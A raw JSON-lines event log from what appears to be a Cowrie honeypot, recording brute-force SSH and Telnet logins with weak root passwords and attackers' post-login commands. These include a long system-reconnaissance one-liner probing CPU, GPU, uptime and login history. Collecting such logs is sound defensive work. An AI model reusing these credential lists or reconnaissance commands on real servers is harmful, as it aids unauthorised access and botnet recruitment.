{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:46:43.123565Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:46:48.059318Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:46:50.448594Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.449420Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.449880Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.450928Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.452104Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.453158Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.453791Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.455421Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.456086Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.456767Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.457390Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.458032Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:46:50.458776Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:46:52.155518Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:46:52.156603Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:46:52.157523Z","src_ip":"212.227.235.229","session":"d276c84d5429"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39851,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb499b8868b7","protocol":"ssh","message":"New connection: 212.227.125.160:39851 (1.2.3.4:22) [session: cb499b8868b7]","sensor":"my-vps","timestamp":"2025-08-26T20:47:52.525403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:47:52.526568Z","src_ip":"212.227.125.160","session":"cb499b8868b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:47:52.653254Z","src_ip":"212.227.125.160","session":"cb499b8868b7"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R","message":"login attempt [root/1q@W3e$R] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:47:53.032272Z","src_ip":"212.227.125.160","session":"cb499b8868b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:47:53.324379Z","src_ip":"212.227.125.160","session":"cb499b8868b7"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-26T20:47:53.325387Z","src_ip":"212.227.125.160","session":"cb499b8868b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:47:53.506228Z","src_ip":"212.227.125.160","session":"cb499b8868b7"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:47:53.549563Z","src_ip":"212.227.125.160","session":"cb499b8868b7"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:47:55.405361Z","src_ip":"212.227.235.229","session":"04714aaeec6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39522,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7b3ac98d06a","protocol":"ssh","message":"New connection: 212.227.235.229:39522 (1.2.3.4:22) [session: e7b3ac98d06a]","sensor":"my-vps","timestamp":"2025-08-26T20:48:32.257633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:48:32.263558Z","src_ip":"212.227.235.229","session":"e7b3ac98d06a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:48:32.506895Z","src_ip":"212.227.235.229","session":"e7b3ac98d06a"}
{"eventid":"cowrie.login.failed","username":"nandan","password":"nandan","message":"login attempt [nandan/nandan] failed","sensor":"my-vps","timestamp":"2025-08-26T20:48:33.502975Z","src_ip":"212.227.235.229","session":"e7b3ac98d06a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59742,"dst_ip":"1.2.3.4","dst_port":22,"session":"03bdb6c14295","protocol":"ssh","message":"New connection: 212.227.235.229:59742 (1.2.3.4:22) [session: 03bdb6c14295]","sensor":"my-vps","timestamp":"2025-08-26T20:49:02.191565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:49:03.244009Z","src_ip":"212.227.235.229","session":"03bdb6c14295"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:49:03.244909Z","src_ip":"212.227.235.229","session":"03bdb6c14295"}
{"eventid":"cowrie.login.success","username":"root","password":"Nishka@123","message":"login attempt [root/Nishka@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:49:07.251904Z","src_ip":"212.227.235.229","session":"03bdb6c14295"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:49:07.799644Z","src_ip":"212.227.235.229","session":"03bdb6c14295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43272,"dst_ip":"1.2.3.4","dst_port":23,"session":"a12108356423","protocol":"telnet","message":"New connection: 212.227.125.160:43272 (1.2.3.4:23) [session: a12108356423]","sensor":"my-vps","timestamp":"2025-08-26T20:49:19.294079Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:49:19.378806Z","src_ip":"212.227.125.160","session":"a12108356423"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:49:19.476882Z","src_ip":"212.227.125.160","session":"a12108356423"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52750,"dst_ip":"1.2.3.4","dst_port":22,"session":"d872a4a2925e","protocol":"ssh","message":"New connection: 212.227.235.229:52750 (1.2.3.4:22) [session: d872a4a2925e]","sensor":"my-vps","timestamp":"2025-08-26T20:49:22.034680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:49:22.035602Z","src_ip":"212.227.235.229","session":"d872a4a2925e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:49:22.294652Z","src_ip":"212.227.235.229","session":"d872a4a2925e"}
{"eventid":"cowrie.login.failed","username":"alexandre","password":"alexandre","message":"login attempt [alexandre/alexandre] failed","sensor":"my-vps","timestamp":"2025-08-26T20:49:23.345381Z","src_ip":"212.227.235.229","session":"d872a4a2925e"}
{"eventid":"cowrie.session.connect","src_ip":"138.197.23.166","src_port":46566,"dst_ip":"1.2.3.4","dst_port":23,"session":"397f240adc5c","protocol":"telnet","message":"New connection: 138.197.23.166:46566 (1.2.3.4:23) [session: 397f240adc5c]","sensor":"my-vps","timestamp":"2025-08-26T20:49:31.100664Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:49:32.555134Z","src_ip":"138.197.23.166","session":"397f240adc5c"}
{"eventid":"cowrie.session.closed","duration":3.697261333465576,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:49:34.797856Z","src_ip":"138.197.23.166","session":"397f240adc5c"}
{"eventid":"cowrie.session.connect","src_ip":"138.197.23.166","src_port":46580,"dst_ip":"1.2.3.4","dst_port":23,"session":"15d92405fb18","protocol":"telnet","message":"New connection: 138.197.23.166:46580 (1.2.3.4:23) [session: 15d92405fb18]","sensor":"my-vps","timestamp":"2025-08-26T20:49:34.887760Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:49:35.134898Z","src_ip":"138.197.23.166","session":"15d92405fb18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:49:35.208611Z","src_ip":"138.197.23.166","session":"15d92405fb18"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T20:49:35.332967Z","src_ip":"138.197.23.166","session":"15d92405fb18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:49:36.367844Z","src_ip":"138.197.23.166","session":"15d92405fb18"}
{"eventid":"cowrie.session.closed","duration":1.4851016998291016,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:49:36.372792Z","src_ip":"138.197.23.166","session":"15d92405fb18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57916,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3e3e62a4f66","protocol":"ssh","message":"New connection: 212.227.235.229:57916 (1.2.3.4:22) [session: c3e3e62a4f66]","sensor":"my-vps","timestamp":"2025-08-26T20:49:38.867534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:49:39.843289Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:49:39.844321Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.login.success","username":"root","password":"wasd","message":"login attempt [root/wasd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:49:43.379699Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:49:45.478613Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
